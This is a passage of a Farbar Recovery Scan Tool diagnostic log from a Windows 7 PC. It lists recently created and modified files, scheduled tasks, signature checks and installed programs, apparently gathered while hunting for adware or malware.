2018-03-01 17:09 - 2018-03-01 17:09 - 000002872 _____ C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2
2018-03-01 17:09 - 2018-03-01 17:09 - 000002860 _____ C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2
2018-03-01 17:09 - 2018-03-01 17:09 - 000002850 _____ C:\Windows\System32\Tasks\wXkHuguozQzssiw2
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-02 08:02 - 000000000 ____D C:\Program Files\K3QPCMS68Z
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:23 - 000000000 ____D C:\Program Files (x86)\One
2018-03-01 17:08 - 2018-03-01 17:14 - 000000000 ____D C:\Users\Martin\AppData\Roaming\eiab2yplwq4
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ C:\Users\Martin\AppData\Local\installer.dat
2018-03-01 11:52 - 2018-03-01 11:52 - 000088024 _____ C:\Windows\system32\Drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys
2018-03-01 11:52 - 2018-03-01 11:52 - 000041224 _____ C:\Windows\uninstaller.dat
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\LastGood.Tmp
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-02 12:09 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:15 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2016-11-17 11:34 - 000003490 _____ C:\Windows\System32\Tasks\AutoKMS
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 11:12 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:06 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-01 17:06 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals
2018-02-17 14:54 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2018-02-17 13:46 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\AppCompat
2018-02-16 15:48 - 2013-10-17 21:57 - 008083703 _____ C:\Windows\system32\nvcoproc.bin

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ () C:\Users\Martin\AppData\Local\installer.dat
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-02 10:21 - 2014-02-01 00:01 - 000585520 ____N (Actual Tools) C:\Users\Martin\AppData\Local\Temp\ammemb.dll
2014-12-06 21:09 - 2014-02-01 00:01 - 001790768 ____N (Actual Tools) C:\Users\Martin\AppData\Local\Temp\ammemb64.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (18-03-2018 09:05:59)
Running from D:\User profile\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-10-17 20:32:57)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1755371218-3412237994-1746218496-500 - Administrator - Disabled)
Guest (S-1-5-21-1755371218-3412237994-1746218496-501 - Limited - Disabled)
Martin (S-1-5-21-1755371218-3412237994-1746218496-1000 - Administrator - Enabled) => C:\Users\Martin

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Actual Multiple Monitors 8.1.1 (HKLM-x32\...\Actual Multiple Monitors_is1) (Version: 8.1.1 - Actual Tools)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.161 - Adobe Systems Incorporated)
Alien Isolation (HKLM-x32\...\Alien Isolation_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\{761CB033-D425-4A16-954D-EA8DEF4D053B}) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\ArcGIS 10.2.2 for Desktop) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
Audiobook Cutter Free Edition (HKLM-x32\...\{7B460E9F-8AEC-4A46-81D5-25A3D15365F1}) (Version: 1.9.3 - Audiobook Software)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BFME2 All-In-One Patch Installer & Switcher version 1.0 (HKLM-x32\...\{B258BEC7-DFB5-4DDC-BA90-BF02B91CA0C6}_is1) (Version: 1.0 - dijkstra & forshire)
Breach (HKLM\...\UDK-640527a6-bd3d-4ff1-8130-b9100ba72023) (Version:  - Epic Games, Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
CloneCD (HKLM-x32\...\CloneCD) (Version:  - SlySoft)
Commandos 2 and 3 (HKLM-x32\...\GOGPACKCOMMANDOS23_is1) (Version: 2.0.0.15 - GOG.com)
Commandos Ammo Pack (HKLM-x32\...\GOGPACKCOMMANDOS1_is1) (Version: 2.0.0.19 - GOG.com)
Company of Heroes (HKLM-x32\...\{BA801B94-C28D-46EE-B806-E1E021A3D519}) (Version: 1.0.0.78 - THQ Inc.)
Core Temp 1.0 RC6 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.0 - Alcpu)
Cossacks 3 (HKLM-x32\...\1797227701_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks 3: Guardians of the Highlands (HKLM-x32\...\1483750963_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks Anthology (HKLM-x32\...\Cossacks Anthology_is1) (Version:  - GOG.com)
Cuphead (HKLM-x32\...\1963513391_is1) (Version: hotfix_1.1.4 - GOG.com)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0337 - Disc Soft Ltd)
Dark Reign + Expansion (HKLM-x32\...\GOGPACKDARKREIGN_is1) (Version: 2.0.0.41 - GOG.com)
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Diaspora version 1.1.1 (HKLM-x32\...\{1F5ABAAA-6D61-4FC1-A595-86CBA5517E7A}_is1) (Version: 1.1.1 - Diaspora Development)
Discord (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Discord) (Version: 0.0.300 - Discord Inc.)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 391.01 - NVIDIA Corporation) Hidden
DisplayFusion 5.1.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 5.1.1.0 - Binary Fortress Software)
Distrust (HKLM-x32\...\Distrust_is1) (Version:  - )
Divinity - Original Sin Enhanced Edition (HKLM-x32\...\1445516929_is1) (Version: 2.5.0.12 - GOG.com)
Divinity Original Sin 2 (HKLM-x32\...\Divinity Original Sin 2_is1) (Version:  - )
Dolphin VR 4.0 (HKLM-x32\...\Dolphin) (Version: 4.0 - Dolphin Team)
Doom (HKLM-x32\...\{B6A2B3BA-C93E-4AEE-BBCF-BE91DDC84962}_is1) (Version:  - id Software)
EasyLog USB (HKLM-x32\...\{4F84DDD2-7468-4771-9906-3552521CE796}) (Version: 6.8.0 - Lascar Electronics Ltd.)
Elite Dangerous Launcher version 0.4.5499.0 (HKLM-x32\...\{696F8871-C91D-4CB1-825D-36BE18065575}_is1) (Version: 0.4.5499.0 - Frontier Developments)
Enter the Gungeon (HKLM-x32\...\1456912569_is1) (Version: 2.7.0.9 - GOG.com)
EVEMon (HKLM-x32\...\EVEMon) (Version: 2.2.3 - battleclinic.com)
EVERSPACE (HKLM-x32\...\1513949567_is1) (Version: 2.0.0.2 - GOG.com)
Exact Audio Copy 1.3 (HKLM-x32\...\Exact Audio Copy) (Version: 1.3 - Andre Wiethoff)
f.lux (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Flux) (Version:  - f.lux Software LLC)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Game of Thrones Episode 6 (HKLM-x32\...\Game of Thrones Episode 6_is1) (Version:  - )
GameRanger (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\GameRanger) (Version:  - GameRanger Technologies)
Gauntlet Slayer Edition (HKLM-x32\...\Gauntlet Slayer Edition_is1) (Version:  - )
GOG.com Commandos 2 (HKLM\...\{c1a036f7-30df-46e5-b5a3-c5e67039e947}.sdb) (Version:  - )
GOG.com Heroes of Might and Magic 3 (HKLM\...\{1d3c859c-1028-4822-b0a7-da4f7bbc18bc}.sdb) (Version:  - )
GOG.com The Settlers 3 (HKLM\...\{f707a2f1-2ed1-4560-a087-97aa176c3777}.sdb) (Version:  - )
GOG.com Unreal Tournament GOTY (HKLM\...\{fa491d91-322c-4059-a1f7-4a79782edee8}.sdb) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 64.0.3282.186 - Google Inc.)
Google Earth Pro (HKLM-x32\...\{FA1BBF34-E994-4310-95D7-BE93092B8E61}) (Version: 7.3.1.4507 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Hammerwatch (HKLM-x32\...\GOGPACKHAMMERWATCH_is1) (Version: 2.3.0.6 - GOG.com)
Hand of Fate - Wildcards (HKLM-x32\...\Hand of Fate: Wildcards_is1) (Version: 2.3.0.7 - GOG.com)
Hand of Fate (HKLM-x32\...\1424100574_is1) (Version: 2.4.0.8 - GOG.com)
Hand of Fate 2 (HKLM\...\aGFuZG9mZmF0ZTI_is1) (Version: 1 - )
Handset USB Driver (HKLM\...\{D2D77DC2-8299-11D1-8949-444553540000}_is1) (Version: 5.2066.1.A14B04 - )
HCS Voice Pack version 1.6.2 (HKLM-x32\...\{CEAF7641-D8E3-41C2-9D26-13D1DE9E6EF7}_is1) (Version: 1.6.2 - HCS Voice Packs)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
HELLDIVERS (HKLM-x32\...\HELLDIVERS_is1) (Version:  - )
Heroes & Generals (HKLM-x32\...\Heroes & Generals) (Version: 1.0.6.1 - Reto-Moto)
Heroes of Might and Magic 3 Complete (HKLM-x32\...\GOGPACKHOMM3COMPLETE_is1) (Version: 2.0.0.16 - GOG.com)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.1.4.6 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
Homeworld Deserts of Kharak (HKLM-x32\...\Homeworld Deserts of Kharak_is1) (Version:  - )
Homeworld Remastered Collection (HKLM-x32\...\SG9tZXdvcmxkUmVtYXN0ZXJlZENvbGxlY3Rpb24=_is1) (Version: 1 - )
How to Survive (HKLM-x32\...\How to Survive_is1) (Version:  - )
How to Survive El Diablo Islands (HKLM-x32\...\How to Survive El Diablo Islands_is1) (Version:  - )
HP Dropbox Plugin (HKLM-x32\...\{23617173-F935-4C17-A323-EB1207F3ED49}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
HP ENVY 4520 series Basic Device Software (HKLM\...\{AA543771-C534-4954-831A-9862C626796F}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP Google Drive Plugin (HKLM-x32\...\{AFF80405-E56A-48E7-98FC-8E46E261949F}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
Hunted - The Demon's Forge (HKLM-x32\...\Hunted - The Demon's Forge_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
iDealshare VideoGo 6.1.1.6250 (HKLM-x32\...\{CC4C06C4-7C78-4AAB-B5AF-33FB11CCD850}_is1) (Version:  - iDealshare Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Java™ 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle)
K-Lite Mega Codec Pack 12.9.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.9.0 - KLCP)
Kutools for Excel 11.0.0.228 (HKLM-x32\...\{A095BA43-4A97-4D55-8E25-A0BC46F10765}_is1) (Version: 11.0.0.0 - Detong)
L.A.Noire (HKLM-x32\...\L.A.Noire_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
LaCie Private Public version 1.2 (HKLM\...\{5553AC21-44FC-4F8B-B3BB-3B7E913F465B}_is1) (Version: 1.2 - LaCie Private, Inc.)
Legend of Grimrock 2 (HKLM-x32\...\Legend of Grimrock 2_is1) (Version:  - )
Lightning (HKLM-x32\...\{277C2E30-99C8-40A5-B5F6-A21422ACDB6A}) (Version:  - )
Little Big Adventure (HKLM-x32\...\GOGPACKLBA_is1) (Version: 2.0.0.20 - GOG.com)
Little Big Adventure 2 (HKLM-x32\...\GOGPACKLBA2_is1) (Version: 2.0.0.6 - GOG.com)
Little Nightmares (HKLM-x32\...\Little Nightmares_is1) (Version:  - )
Little Nightmares Secrets of The Maw Chapter 1 (HKLM-x32\...\Little Nightmares Secrets of The Maw Chapter 1_is1) (Version:  - )
LogMeIn Hamachi (HKLM-x32\...\{99A016E1-0840-43AE-8434-A18CEDFA833B}) (Version: 2.2.0.58 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.58 - LogMeIn, Inc.)
LOTR The Return of the King tm (HKLM-x32\...\{6E298B0A-558C-4138-0096-740677B382CD}) (Version:  - )
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Master of Magic (HKLM-x32\...\GOGPACKMASTEROFMAGIC_is1) (Version: 2.0.0.20 - GOG.com)
Metal SLUG X 1.0 (HKLM-x32\...\Metal SLUG X 1.0) (Version: 1.0 - Èãðû íà Cat-A-Cat.NET)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
